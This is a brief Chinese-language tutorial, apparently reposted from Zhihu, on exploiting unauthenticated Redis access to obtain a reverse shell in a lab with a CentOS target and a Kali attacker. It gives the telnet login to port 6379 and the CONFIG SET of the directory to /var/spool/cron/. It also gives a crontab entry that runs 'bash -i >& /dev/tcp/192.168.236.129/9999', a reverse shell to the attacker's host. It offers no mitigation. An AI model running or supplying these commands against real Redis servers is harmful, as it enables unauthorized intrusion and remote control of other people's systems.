Redis未授权访问之反弹shell

靶机:centos6.5

公鸡:Kali

一、crontab基础姿势

Crontab定时任务配置 - 潇湘隐者 - 博客园

二、redis未授权登录服务器

1、telnet登录/也可以redis-cli登录

telnet 192.168.236.130 6379 //未授权登录

config set dir /var/spool/cron/ //配置文件夹的路径(CONFIG SET 命令可以动态地调整 Redis 服务器的配置而(configuration)而无须重启。)//每个用户生成的crontab文件,都会放在 /var/spool/cron/ 目录下面

set -.- "\n\n\n* * * * * bash -i >& /dev/tcp/192.168.236.129/9999 0>&1\n\n\n" //直接往当前用户的crontab里写入反弹shell,换行是必不可少的。

三、nc反弹

四、Centos里面查看crontab任务。

作者:呵呵呵呵呵呵
链接:https://zhuanlan.zhihu.com/p/25015624
来源:知乎
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

本文由 华盟网 作者:congtou 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

2

相关文章

发表评论

电子邮件地址不会被公开。